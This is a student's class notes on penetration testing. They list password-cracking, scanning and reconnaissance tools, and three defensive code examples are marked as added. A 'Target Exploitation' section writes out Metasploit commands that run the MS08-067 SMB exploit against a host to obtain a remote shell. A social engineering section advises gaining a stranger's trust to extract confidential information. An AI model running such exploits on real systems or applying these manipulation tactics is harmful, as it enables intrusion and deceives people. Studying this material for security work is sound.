Privilege Escalation

Last week I had a class at my university about PRIVILEGE ESCALATION. What I got from this topic is:

– Authentication can be based on three things: something you know, something you have, and who you are.

– There are two types of password attack: offline attacks (getting physical access to the machine) and online attacks (attacking from a distance / remotely).

– Offline cracking tools include RainbowCrack, samdump, John the Ripper, Ophcrack (to crack the password), crunch, and wyd.

– Online cracking tools include BruteSSH, Hydra, Dsniff, and Wireshark (tcpdump).

– The man-in-the-middle attack means that we, as the attacker, disguise our MAC address as the gateway for the network traffic between two or more clients.
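Seen from the defending side, the gateway disguise described in the last point shows up as the gateway's IP address suddenly being answered for by a different MAC. The following is an added example, not part of the original notes; the gateway address, the pinned MAC and the ARP observations are constructed values.

```python
from collections import defaultdict

# Assumed values for illustration: the gateway address and its known-good MAC.
GATEWAY_IP = "192.168.0.1"
PINNED_GATEWAY_MAC = "00:11:22:33:44:55"

# Constructed sample of observed ARP replies: (seconds, sender IP, sender MAC).
SAMPLE_ARP_REPLIES = [
    (0, "192.168.0.1", "00:11:22:33:44:55"),
    (1, "192.168.0.7", "aa:aa:aa:aa:aa:07"),
    (2, "192.168.0.9", "de:ad:be:ef:00:09"),
    (30, "192.168.0.1", "de:ad:be:ef:00:09"),  # gateway IP claimed by .9's MAC
    (31, "192.168.0.1", "DE-AD-BE-EF-00-09"),  # same claim, other notation
    (60, "192.168.0.7", "aa:aa:aa:aa:aa:07"),
]


def normalize_mac(mac):
    """Lower-case and use ':' so the same address always compares equal."""
    return mac.lower().replace("-", ":")


def detect_arp_spoofing(replies, gateway_ip, pinned_mac):
    """Return (alerts, shared): binding changes and MACs answering for >1 IP."""
    pinned = normalize_mac(pinned_mac)
    ip_to_macs, mac_to_ips = defaultdict(set), defaultdict(set)
    alerts = []
    for _ts, ip, raw_mac in replies:
        mac = normalize_mac(raw_mac)
        alert = None
        if ip == gateway_ip and mac != pinned:
            alert = ("gateway_mac_mismatch", ip, mac)
        elif ip_to_macs[ip] and mac not in ip_to_macs[ip]:
            alert = ("ip_changed_mac", ip, mac)
        if alert and alert not in alerts:
            alerts.append(alert)
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
    shared = {m: sorted(ips) for m, ips in mac_to_ips.items() if len(ips) > 1}
    return alerts, shared


if __name__ == "__main__":
    print(detect_arp_spoofing(SAMPLE_ARP_REPLIES, GATEWAY_IP, PINNED_GATEWAY_MAC))
```

The second return value names the MAC that answers for both the gateway and another host, which is the machine to look at first.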

TARGET EXPLOITATION

After we discover the target’s information, description, open ports, and vulnerabilities, we can start to exploit the target. This step practically finalizes the penetration test, because it tests the target to discover whether it can be exploited or not.

 

In this demonstration I use “Metasploit”.

 

Try to follow these steps with me:

 

First of all, you have to download BackTrack 5 from the internet. You can get it at http://www.backtrack-linux.org/downloads/

 

Run the following commands:

# cd /pentest/exploits/framework/

# ./msfcli -h

# ./msfcli windows/smb/ms08_067_netapi O

# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P

# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7


 

And now you are connected to your target’s command prompt 🙂 Enjoy the exploitation.

 

SOCIAL ENGINEERING

Social engineering is basically a process of gathering confidential information about a target from another person by communicating with them. Two common tactics are applied to accomplish this task: interviewing another person or interrogating another person. But the second one is actually a bit more violent than interviewing, so I prefer the first one, which is interviewing. However, people will not reveal the confidential information they have to someone they have never talked to before or to a stranger. So, in order to get the information you need from them, you have to make them “trust” you. If not, you will not be able to obtain the confidential information you need from them.

 

Below is a demonstration of the social engineering process using the SET and CUPP tools:

SET:


CUPP:


Basically, CUPP lists all the possible passwords for someone using their personal information.
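Because such lists are built from personal information, a password-change check can refuse passwords that contain it. This is an added example, not part of the original post; the profile fields, the substitution table and the sample passwords are constructed assumptions.

```python
import re

# Common character substitutions, undone before matching (assumed table).
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})

# Constructed profile of the kind a profile-based wordlist is built from.
SAMPLE_PROFILE = {
    "first_name": "Maria",
    "surname": "Lopez",
    "pet": "Rex",
    "birthdate": "1994-08-17",
    "company": "Acme Corp",
}


def profile_tokens(profile, min_len=3):
    """Split every profile value into lower-case words and digit runs."""
    tokens = set()
    for value in profile.values():
        for part in re.findall(r"[a-z]+|\d+", value.lower()):
            if len(part) >= min_len:  # very short tokens match almost anything
                tokens.add(part)
    return tokens


def personal_info_hits(password, profile):
    """Return the profile tokens found in the password, sorted.

    The password is checked as typed, with substitutions undone, and
    reversed, since guess lists usually include those variants.
    """
    raw = password.lower()
    forms = {raw, raw.translate(LEET)}
    forms |= {form[::-1] for form in forms}
    return sorted(t for t in profile_tokens(profile)
                  if any(t in form for form in forms))


def is_acceptable(password, profile):
    """Accept only passwords that contain no personal-information token."""
    return not personal_info_hits(password, profile)


if __name__ == "__main__":
    for candidate in ("M4r1a1994!", "zepol#22", "correct-horse-battery"):
        print(candidate, personal_info_hits(candidate, SAMPLE_PROFILE))
```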

VULNERABILITY MAPPING

Vulnerability mapping is a process of determining and analyzing the critical security flaws and holes within the target environment. This process is also called “VULNERABILITY ASSESSMENT”. There are 2 types of vulnerability: LOCAL VULNERABILITY and REMOTE VULNERABILITY. A local vulnerability is one for which the attacker requires local access, while a remote vulnerability is one that can be exploited by triggering a malicious piece of code over the network.

 

Below is a demonstration of the VULNERABILITY MAPPING process using some tools:

OPEN VAS:

Before using this tool, you have to set it up first.

You can do the setup by following the steps provided at this link:

http://www.backtrack-linux.org/wiki/index.php/OpenVas

 

And these are some screenshots from the OPEN VAS tool:

 


JBROFUZZ:

To open it we type:

# cd /pentest/fuzzers/jbrofuzz/

# java -jar JBroFuzz.jar


Enumerating Target

Enumerating the target is a process used to find and collect information on the ports and services available in the target environment. This process is usually done after we have already discovered the live targets through the target discovery process.

 

To enumerate the target, we can use the PORT SCANNING method. The purpose is to find the open ports that we can access.

 

Below are demonstrations of ENUMERATING TARGET using some tools:

SUPERSCAN:


NMAP:


ZENMAP:


From this we can conclude that port scanning will report each port as open, closed, or filtered.
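The same three states are what an administrator reviews when auditing their own hosts. The following added example, not part of the original post, parses scan results saved in nmap's grepable layout (-oG) and lists open ports that are not on an approved baseline; the scan text and the baseline are constructed.

```python
from collections import defaultdict

# Constructed sample in nmap's grepable (-oG) layout; fields are tab-separated.
SAMPLE_GNMAP = (
    "# constructed sample, not output of a real scan\n"
    "Host: 192.168.0.7 ()\tStatus: Up\n"
    "Host: 192.168.0.7 ()\tPorts: 80/open/tcp//http///, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "3389/filtered/tcp//ms-wbt-server///, 8080/closed/tcp//http-proxy///\n"
    "Host: 192.168.0.9 ()\tPorts: 22/open/tcp//ssh///, 23/open/tcp//telnet///"
    "\tIgnored State: closed (998)\n"
)

# Constructed baseline: the (port, protocol) pairs each host may expose.
APPROVED = {"192.168.0.7": {(80, "tcp")}, "192.168.0.9": {(22, "tcp")}}


def parse_gnmap(text):
    """Return {host: {state: [(port, proto, service), ...]}}.

    open     = a service accepted the probe
    closed   = the host answered, but nothing listens on the port
    filtered = no usable answer, typically a firewall dropping the probe
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comments and "Status:" lines carry no port data
        fields = line.split("\t")
        host = fields[0].split()[1]
        ports = next(f for f in fields if f.startswith("Ports:"))
        states = hosts.setdefault(host, defaultdict(list))
        for entry in ports[len("Ports:"):].split(","):
            parts = entry.strip().split("/")
            if len(parts) < 5:
                continue  # malformed entry
            port, state, proto, _owner, service = parts[:5]
            states[state].append((int(port), proto, service))
    return hosts


def unapproved_open(hosts, approved):
    """List (host, port, proto, service) for open ports not in the baseline."""
    findings = []
    for host, states in sorted(hosts.items()):
        for port, proto, service in states.get("open", []):
            if (port, proto) not in approved.get(host, set()):
                findings.append((host, port, proto, service))
    return findings
```

On the sample, the SMB ports on 192.168.0.7 and telnet on 192.168.0.9 are reported, while the filtered and closed ports are kept only for reference.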

TARGET DISCOVERY

In the target discovery process, what we must do is find out which targets are alive and which are not. One of the common ways to do this is to send ICMP ECHO packets across the network to discover which targets are alive and which are not.

 

Below is a demonstration of the TARGET DISCOVERY process using some tools:

 

FPING:


ARPING:


HPING:


ZENMAP:


Information Gathering Tools

Information gathering is a very important process in penetration testing. Before we do the penetration test, we must gather as much information as we can from the outside. It is simple logic: how can we get through the security system without knowing anything about that system in the first place?

 

Below is a demonstration of the information gathering process using several information gathering tools: Sam Spade, nslookup, and Maltego:

SAM SPADE:

With this tool, I just type the domain of the website you want information about, and SAM SPADE then generates the information about that website, for example the DNS, IP address, the last update, the most updated date, etc.

 

NSLOOKUP:

 

Just type the domain name of a website into nslookup, and it will generate the information about that website, for example the DNS.

 

MALTEGO:

With Maltego, we can obtain a great deal of information about people, companies, institutions, etc. We can obtain email addresses, DNS, and much personal information.